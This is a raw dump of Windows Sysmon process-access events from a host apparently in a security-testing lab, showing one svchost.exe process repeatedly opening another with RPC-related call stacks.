12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
